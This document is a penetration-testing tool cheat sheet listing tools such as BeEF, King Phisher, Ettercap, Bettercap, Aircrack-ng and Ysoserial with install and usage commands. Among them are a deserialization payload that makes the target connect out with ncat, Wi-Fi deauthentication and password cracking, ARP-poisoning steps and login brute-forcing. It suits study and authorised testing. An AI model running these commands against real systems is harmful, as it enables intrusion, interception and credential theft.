Reference List
Lynis – An auditing tool for Unix-based systems. It scans the system by performing many security control checks [Link].
sudo apt install lynis
sudo lynis audit system
sudo lynis -Q --cronjob
BeEF – Classified as a penetration testing tool that focuses on the web browser, but in fact it is a very malicious tool that can be used to exploit web vulnerabilities. The phishing features are incredible and mimic Gmail or Facebook login pages, for example [Link].
sudo apt install beef-xss
sudo beef-xss
It will ask you to set a new password.
In the browser, go to http://127.0.0.1:3000/ui/panel. The default user is beef.
Autopsy – A digital forensics tool used by law enforcement officials to investigate what happened on a computer, disk drive, or flash drive [Link].
sudo autopsy
OR
sudo autopsy &
In the browser, go to http://localhost:9999/autopsy.
King Phisher – A tool for Phishing Awareness Campaign [Link].
sudo systemctl start postgresql
sudo systemctl start king-phisher
cd /usr/share/king-phisher/
sudo ./KingPhisherServer server_config.yml
If port 80 is already in use, you will have to kill the process holding it (PID 123456 in this example):
sudo netstat -tulpn
sudo kill 123456
Leave the server running in one terminal and, in another terminal, start the client:
cd /usr/share/king-phisher
./KingPhisher
Kali Linux already has it installed and it is accessible from the main menu.
Yersinia – A DHCP starvation attack tool. One such attack can make the legitimate DHCP server inoperative, after which the attacker acts as the DHCP server of the network, usually assigning itself as the DNS server and directing users to malicious websites [Link].
sudo apt install yersinia
sudo yersinia -G
SocialEngineeringToolkit – SET is an open-source penetration testing framework with a large number of custom attack vectors [Link].
sudo setoolkit
Ettercap – Man-in-the-middle attack tool using ARP poisoning [Link].
- Select the interface(s) used for the attack and click the Accept button,
- Scan the network for hosts, list them, and add the targets to target groups 1 and 2,
- In the MITM menu, select ARP poisoning,
- If it has not started, start the sniffing,
- Now check the ARP table on both devices and compare it to the real one,
- On the man-in-the-middle box, use Wireshark or tcpdump, for example, to capture the packets being transmitted between both targets.
Bettercap – Alternative to Ettercap, with additional features such as Wi-Fi [Link]. The lines starting with >> are typed at the bettercap prompt.
sudo apt install bettercap
sudo bettercap --iface wlan0
>> wifi.recon on
>> events.ignore wifi.ap.new
>> set net.sniff.output handshake.pcap
>> net.sniff on
>> events.ignore net.sniff.802.11
>> wifi.show
>> wifi.recon.channel 11
>> wifi.show
>> wifi.deauth FF:FF:FF:FF:FF:FF
>> events.ignore wifi.client.probe
AirCrack-ng – It consists of a detector, packet sniffer, WEP/WPA/WPA2-PSK cracker, and analysis tool for 802.11 [Link].
sudo apt install aircrack-ng
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
sudo aircrack-ng handshake.pcap -w /usr/share/wordlists/rockyou.txt
LazyRecon – A very straightforward scanner intended to automate some tedious reconnaissance and information-gathering tasks, presenting the results as an HTML report [Link].
git clone https://github.com/nahamsec/lazyrecon.git
./lazyrecon.sh -d example.com -e excluded.example.com
Wapiti – A web application security scanner. It performs "black-box" scans (it does not study the source code) by crawling the web pages of the application looking for scripts and forms where it can inject data, and produces an HTML report [Link].
wapiti -u https://example.com
SpiderFoot – It uses OSINT to gather information about a specific target of an investigation. It crawls websites looking for IPs, domains/subdomains, hostnames, network subnets (CIDR), autonomous system numbers (ASN), e-mail addresses, phone numbers, usernames, person names, and Bitcoin addresses. Then, using 200+ modules, it can gather even more information about them, for example the transactions and balance of the discovered Bitcoin addresses [Link].
sudo spiderfoot -m sfp_spider,sfp_bitcoin,sfp_blockchain -s example.com -F BITCOIN_ADDRESS,BITCOIN_BALANCE -q
sudo spiderfoot -m sfp_spider,sfp_ethereum -s example.com -F ETHEREUM_ADDRESS -q
Ysoserial – A collection of utilities for exploiting Java applications that perform unsafe deserialization of objects and use vulnerable libraries, in order to get remote code execution [Link].
java -jar ysoserial.jar CommonsCollections4 'ncat 10.0.0.1 8888' > payload
cat payload | nc 10.10.10.10 PORT
First, Ysoserial was used to create a Java payload for the chosen gadget chain (CommonsCollections4) and the remote command to be executed. Then the payload was sent over the netcat connection to the port (PORT above) where the example's vulnerable application was listening.
NoSQLMap – A tool designed to automate injection attacks and exploit default configuration weaknesses in NoSQL databases (such as MongoDB) and web apps using NoSQL [Link].
git clone https://github.com/codingo/NoSQLMap.git
./setup.py
./nosqlmap.py
MobSF – Mobile Security Framework is a mobile application (Android/iOS/Windows) malware analyzer. It is capable of performing static and dynamic analysis in a sandbox and generating reports [Link].
git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git
cd Mobile-Security-Framework-MobSF
./setup.sh
./run.sh 127.0.0.1:8000
Then open the web browser and access http://localhost:8000/.
Upload the app file (an APK, for example) and explore the functionalities.
JADX – A (CLI and GUI) decompiler that produces Java source code from Android Dex and APK files [Link]. See also Dex2Jar [Link] and JAD [Link].
sudo apt install jadx
jadx app.apk
Frida – A toolkit for developers, reverse-engineers, and security researchers. It is a dynamic binary instrumentation framework [Link].
pip install frida-tools
OR
docker run --security-opt seccomp:unconfined -it name_of_the_docker /bin/bash
Basic commands:
- frida-ps: List the names and PIDs of all running processes.
- frida-ps -U: The same, but on a USB-attached device.
- frida-ls-devices: List all attached devices.
- frida-trace -U Twitter -i "recv*": Trace native API calls (here, every function whose name starts with recv, in the Twitter process on the USB device).
Recon-ng – A web reconnaissance framework designed exclusively for web-based open-source reconnaissance [Link]. The lines starting with > are typed at the recon-ng prompt; replace YOUR_SHODAN_API_KEY with your own key.
recon-ng
> marketplace search contacts
> marketplace install recon/domains-contacts/whois_pocs
> modules load recon/domains-contacts/whois_pocs
> info
> options unset SOURCE
> options set SOURCE example.com
> run
> back
> marketplace search domain
> marketplace install recon/domains-hosts/bing_domain_web
> modules load recon/domains-hosts/bing_domain_web
> options set SOURCE example.com
> run
> marketplace search google
> marketplace install recon/domains-hosts/google_site_web
> modules load recon/domains-hosts/google_site_web
> options set SOURCE example.com
> run
> marketplace search interesting
> marketplace install discovery/info_disclosure/interesting_files
> modules load discovery/info_disclosure/interesting_files
> options set PORT 443
> options set PROTOCOL https
> run
> shell ls ~/.recon-ng/workspaces/default/
> marketplace search shodan
> marketplace install recon/domains-hosts/shodan_hostname
> keys add shodan_api YOUR_SHODAN_API_KEY
> modules load recon/domains-hosts/shodan_hostname
> options set SOURCE example.com
> run
> show hosts
> show contacts
> workspaces create new
> show hosts
> workspaces list
> workspaces load default
> db schema
> db delete hosts
> db insert hosts
> marketplace search report
> marketplace install reporting/html
> modules load reporting/html
> options set CREATOR MyName
> options set CUSTOMER MyClient
> run
> exit
Web Interface
locate recon-web
/usr/share/recon-ng/recon-web
WPScan – A free WordPress security scanner [Link].
wpscan --update
wpscan --url https://example.com
wpscan --url https://example.com --enumerate p
wpscan --url https://example.com --enumerate u
wpscan --url https://example.com --enumerate t
wpscan --url https://example.com --enumerate tt
wpscan --url https://example.com --proxy 127.0.0.1:8118
wpscan --url https://example.com --wordlist word.lst --threads 50 --username admin
Naabu – A simple and fast port scanner for enumerating valid ports using a fast SYN scan on a host or list of hosts [Link].
docker pull projectdiscovery/naabu
docker run -it projectdiscovery/naabu -host example.com -silent
docker run -it projectdiscovery/naabu -host example.com -silent -p -
docker run -it projectdiscovery/naabu -host example.com -silent -iL hosts.txt
docker run -it projectdiscovery/naabu -host example.com -silent -nmap-cli 'nmap -sV'
docker run -it projectdiscovery/naabu -host example.com -silent -o output.txt
docker run -it projectdiscovery/naabu -host example.com -silent -interface eth0
docker run -it projectdiscovery/naabu -host example.com -silent -source-ip 10.10.10.10
FFUF – Fuzzing tool for web applications [Link].
sudo apt install golang-go
go get -u github.com/ffuf/ffuf
~/go/bin/ffuf -V
OR
sudo apt install ffuf
ffuf -V
Usage:
ffuf -u https://example.com/FUZZ/ -w word.lst
ffuf -u https://example.com/?s=FUZZ -w word.lst
ffuf -u https://example.com/FUZZ -w word.lst -c
ffuf -u https://example.com/FUZZ -w word.lst -sf
ffuf -u https://example.com/FUZZ -w word.lst -recursion -e .bak
ffuf -u https://example.com/FUZZ -w word.lst -s -of html -o output.txt
ffuf -u https://W1.com/W2 -w domain.lst:W1 -w word.lst:W2
ffuf -u https://example.com/ -X POST -d "username=W1&password=W2" -w users.lst:W1 -w passes.lst:W2
ffuf -u https://example.com/FUZZ -w word.lst -x http://proxy:port
ffuf -u https://example.com/FUZZ -w word.lst -x socks5://127.0.0.1:9150
wFuzz – Another fuzzing tool for web applications [Link]. It can be used with FuzzHTTPBypass [Link] to automate fuzzing in an attempt to bypass unknown authentication methods.
Installation
sudo apt install wfuzz -y
OR
pip3 install wfuzz
Usage
wfuzz -c -v --hc 404 -w word.lst http://example.com/FUZZ
wfuzz -c -z file,/PATH/users.lst -z file,/PATH/passes.lst,md5 -d "user=FUZZ&pass=FUZ2Z" --sc 200 http://example.com/wp-login.php
wfuzz -c -z range,0-255 http://192.168.1.FUZZ/
wfuzz -c -z list,zip-tar-gz-bkp-backup-copy-txt http://example.com/credentials.FUZZ
wfuzz -c -w word.lst -f /PATH/output,csv http://example.com/FUZZ
wfuzz -c -w word.lst -p 127.0.0.1:8080:HTTP http://example.com/FUZZ
wfuzz -c -w user-agents.lst --ss "Welcome " -H "User-Agent: FUZZ" http://example.com/target.php
wfuzz -z list,GET-HEAD-POST-TRACE-OPTIONS -X FUZZ http://example.com/target.php
Available output formats:
wfuzz -e printers
- csv: Text comma-separated file.
- field: Only fields, no header or footer.
- html: HTML formatted.
- json: JSON formatted.
- magictree: Prints in a friendly tree format.
- raw: No formatting.
Available Encoders:
wfuzz -e encoders
- utf8
- base64
- urlencode
- double_urlencode
- md5
- sha256
- mssql_char
- …
Proxy types:
- HTTP (default)
- SOCKS4
- SOCKS5
Filtering results using a simple or regex expression:
- --hs/--ss "Invalid username": Hide/Show using a simple expression.
- --hs/--ss "Invalid *": Hide/Show using a regex.
- --hc/--sc CODE: Hide/Show by response status code.
- --hl/--sl NUM: Hide/Show by number of lines in the response.
- --hw/--sw NUM: Hide/Show by number of words in the response.
- --hh/--sh NUM: Hide/Show by number of chars in the response.
DirSearch – A web path scanner that brute-forces directories and files on a web server [Link].
git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch
pip3 install -r requirements.txt
./dirsearch.py -u https://example.com
./dirsearch.py -e php,asp,cgi -w word.lst -r -R 5 -t 50 -m POST --data "username=admin" -u https://example.com
SubFinder – Designed to discover valid subdomains using passive online sources [Link].
sudo apt install subfinder -y
subfinder -d example.com
subfinder -d example.com -silent
subfinder -v -d example.com
subfinder -dL domains.txt
HTTPx – A fast HTTP probing toolkit from ProjectDiscovery that checks which hosts (for example, the subdomains found by SubFinder) are serving HTTP/HTTPS [Link].
git clone https://github.com/projectdiscovery/httpx.git
cd httpx/cmd/httpx
go build
sudo mv httpx /usr/local/bin/
httpx -version
echo example.com | httpx
echo example.com | httpx -silent
subfinder -d example.com -silent | httpx -silent